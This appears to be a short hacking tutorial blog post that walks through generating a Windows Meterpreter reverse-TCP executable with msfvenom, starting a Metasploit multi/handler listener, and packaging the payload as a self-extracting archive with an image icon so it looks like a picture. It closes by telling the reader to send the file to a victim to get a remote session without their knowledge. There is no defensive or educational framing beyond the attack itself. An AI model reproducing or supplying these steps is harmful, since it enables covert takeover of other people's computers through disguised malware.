Steganography: Hiding payload behind image
Steganography: Hiding payload behind the image
In this article, we’ll look at how to hide our payload within an image. This will allow us to gain remote access to our victim’s system without his knowledge.
Steganography is the process of concealing a payload or anything else behind any media or file.
Steps 1. Let’s check our IP address:-
Ifconfig

Step 2. Create a payload
msfvenom -p windows/meterpreter/reverse_tcp lhost 192.168.128.128 lport 4444 -f exe > /home/lucifer/Desktop/test.exe

Step 3. Open Listener
msfconsole

Step 4. Set handler
use exploit/multi/handler

Step 5. Set payload
set payload windows/meterpreter/reverse_tcp

Step 6. Set lhost
set lhost 192.168.128.128

Step 7. Set lport
set lport 4444

Step 8. Check for remaining requirements
show options

Step 9. Let’s exploit
exploit

Now, we will take our payload to the windows environment

Step 10. Let’s download a PNG image behind which we are going to hide our payload

Step 11. Now let’s get our icon so open ICOCONVERTER.COM
Step 12. Let’s get our icon

Step 13. Place your payload, png and icon in one place
Step 14. Now select your payload and Png image together and click on add to the archive
Step 15. Change the name, Create on SFX archive and choose compression method to best

Step 16. Click on the Advance option and choose SFX options

Step 17. Click on the Update option and choose extract and update files in update mode and choose overwrite all files in overwrite mode

Step 18. Now go to the setup option and give your payload name and image name with extension

Step 19. Now go to the Text and icon option and choose load SFX icon from the file and upload your icon file
![]()
Step 20. Click on OK and OK
Step 21. Your final payload will be created which is in looking like an image that we choose

Step 22. Send this final image to your victim and you will get your meterpreter session as soon as your victim will open that image
